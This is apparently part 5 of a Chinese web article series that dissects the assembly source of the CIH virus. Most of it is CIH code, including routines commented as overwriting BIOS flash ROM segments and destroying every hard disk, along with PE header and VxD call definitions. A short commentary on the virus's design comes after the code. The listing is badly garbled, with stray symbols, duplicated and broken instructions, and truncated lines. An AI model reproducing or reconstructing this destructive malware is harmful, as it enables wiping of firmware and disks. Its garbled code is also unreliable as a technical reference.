病毒程式原始碼實例剖析-CIH病毒[5]

病毒程式原始碼實例剖析-CIH病毒[5]

push ecx 
　　loop $ 
　　
　　;破壞BIOS中額外的000E0000 - 000E007F段的ROM資料，共80h個位元組 
　　
　　xchg ecx, eax 
　　loop $ 
　　
; 顯示並啟動BIOS的000E0000 - 000FFFFF段數據，共128 KB，該段可寫入訊息mov eax, 0f5555h 
　　pop ecx ptr [eax], 20h 
　　
　　loop $
　　
　　; 破壞BIOS的000FE000 - 000FE07F段數據，共80h字節 
　　mov ah, 0e0h 　『 00F0000 - 000FFFFF段，共64 KB 
　　mov word ptr (BooleanCalculateCode-@ 10)[esi], 100ch 
　　call esi 
　　
　　; 破壞所有硬碟
　　KillHardDisk: 
　〜　　KillHardDisk:bumber 　〜〜『 
　　push ebx 
　　sub esp, 2ch 
　　push 0c00001000h 
　　mov bhpush, 08〠〦〦〦〠〠〦〠〠〠〠〝pushpusho〠〠) ecx 
　　push ecx 
　　push ecx 
　　push 40000501h 
　　頟
　　mov esi, esp 
　　sub esp, 0ach 
　　
　　;循環進行破壞
　　『 4h 
　　
　　cmp word ptr [esi+06h], 0017h 
　　je KillNextDataSection 
　　
　　;換下一個硬碟
　　ChangeNextHardDisk:〜『〟〜〦〜]　　jmp LoopOfKillHardDisk 
　　
　　;破壞下一個區域
　　KillNextDataSection: 
　　add dword ptr [esi+ 10h], ebx 
　　mov byte ptr [esi+4dh], FirstKillHardDiskNumber 
　　
　　jmp　able PROMToWrite: 
　　mov [eax], cl 
　　mov [ecx], al 
　　mov byte ptr [ eax], 80h 
　　mov [eax], cl 
　　mov [ecx], al 
　　
　　ret 🀜EE:P0　　㟎　　ret 🀜 
　　
　　xchg eax, edi 
　　xchg edx, ebp 
　　out dx, eot , edi 
　　xchg edx, ebp 
　　in al, dx 
　　
　　BooleanCalculateCode = $g edi 
　　xchg edx, ebp 
　　out dx, eax 
　　
　　xchg eax, edi 
　　x 。 
　　db IFSMgr_RemoveFileSystemApiHook-_PageAllocate 
　　db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook 
　擯指令　db＀＀＂說話之差 
　　
　　VxdCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h ;Vxd的呼叫編號〦〜>使用Vxd調用的個數 
　　
　　;病毒版本和版權資訊定義
　　VirusVersionCopyright db ' CIH v' ;CIH病毒的標識 
　　db MajorVirusVersion+'0' ;主版號 
　　db '.' 
　　db MinorVirusVersion+'0' ;次版本號' 
　　db MinorVirusVersion+'0' ;次版本號' 
　　db MinorVirusVersion+'0' ;次版本號' 
　　db MinorVirusVersion+'0' ;　; 病毒大小
　　VirusSize = $ + SizeOfVirusCodeSectionTableEndMark(04h) 
　　 + NumberOfSections*SizeOfVirusCodeSectionTable(08h) 
　　＀　VirusGameDataStartAddress = VirusSize 
　　@6 = VirusGameDataStartAddress ;病毒資料起始位址
　　
　　OnBusy db 0 ;「忙碌」標誌
　　FileModificationTime dd ? ;檔案修改時間 
　　
　　FileNameBuffer db FileNameBufferSize dup(?) ;7fh長的檔案名稱緩衝區〠🀜　〠『〜『〜『Ｓ＀　〜〦〦〜〦〦〦〦〦〦〦〦〦〦》〦​​＀〜〦〦〦〜〦〦〜C＊〜〦〜〜〦〦〜〦〜〦〦〜C＜〦​​m〜〦〜C＀〜C＀〜C＊〜〜　 •
　　@8 = DataBuffer 
　　NumberOfSections dw ? ; 區塊數目 
　　TimeDateStamp dd ? ; 文件時間 
　　SymbolsPointer dd ? 
　　NumberOfSymbols dd ? ; 符號表中符號個數 
　SizeOfOptionalHeader dw ?個檔案」的長度符號符號集 ; Magic dw ? ;標誌字(總是010bh)
　　LinkerVersion dw ? ;連接器版本號 
。程式碼段起始RVA 
　　BaseOfData dd ? ;資料段起始RVA 
　　ImageBase dd ? ;裝入基址RVA 
　　
　　@9 = $ 
　　SectionAlignment 對塊對齊sion dd ? ;所需作業系統版本號碼 
　　ImageVersion dd ? ;使用者自訂版本號 
　　SubsystemVersion dd ? ;所需子系統版本號 
　　Reserved dd ? ; 保留 
　　SizeOfImage ) ? 各部份總長izeOfImageHeaderToRead = $-NumberOfSections 
　　NewAddressOfEntryPoint = DataBuffer 
　　SizeOfImageHeaderToWrite = 04h 
　　
　　StartOfSectionTable = @9 
　　SectionName = StartOfSectionTable = @9 
　　SectionName = StartOfSectionTable = @9 
　 
　　VirtualAddress = StartOfSectionTable+0ch ;區塊的RVA 
　　SizeOfRawData = StartOfSectionTable+10h ; 區塊實體長度 
PointerToRawData = StartOfSectionTable+14h ; 區塊實體偏移 
　　PointerToRelocations = StartOfSectionTable+18h ; 重定位的偏移 
　　PointerToLineNumbers = StartOfSection？ Table+20h ; 重定位項目數目 
　　NumberOfLinenNmbers = StartOfSectionTable +22h ; 行號表的數目 
　　Characteristics = StartOfSectionTable+24h ; 區塊屬性 
　　SizeOfScetionTable = Characteristics+04h-SectionName ; 每塊表塊表所需要的數量所需要的記憶體的數量；　VirusNeedBaseMemory = $ 
　　VirusNeedBaseMemory = $ 

　　VirusTotalNeedMemory = @9 
　　; + NumberOfSections(??)*SizeOfScetionTable(28h) 
　　; + SOfVirusCodeS.? fVirusCodeSectionTable(08h) 
　　; + SizeOfTheFirstVirusCodeSectionTable(04h) 
　　
　　;病毒程式結束
　　VirusGame ENDS 
　　END FileHeader
　　從上述程式碼分析過程中，我們可以看出，CIH病毒結構清晰，層次分明。此病毒程式的主幹結構與DOS病毒極為相似，只不過對病毒細節的處理都是依win95方法，全部系統呼叫都是採用Vxd。這樣做讓病毒程式更加底層、效率更高，也便於編程，與用Windows下的API函數相比，無須考慮病毒本身的複雜重定位過程；與使用中斷相比，又更能防止對程式的追蹤分析。

　　CIH病毒有兩個創新，一是病毒感染時查找感染對象文件的各塊之間的空白區域,把病毒自己的各種數據結構和代碼寫到其中（如果空白區域不夠就不傳染，這就是為什麼有些文件不會被感染的原因之一）；二是病毒發作時能破壞電腦硬件，不但要燒毀Flash Memory，還要毀壞硬碟。

　　出於安全的緣故，有關病毒發作、破壞硬體的這部分代碼，我們沒有給出詳細的分析。




以上就是病毒程式原始碼實例剖析-CIH病毒[5]的內容，更多相關內容請關注PHP中文網（www.php.cn）！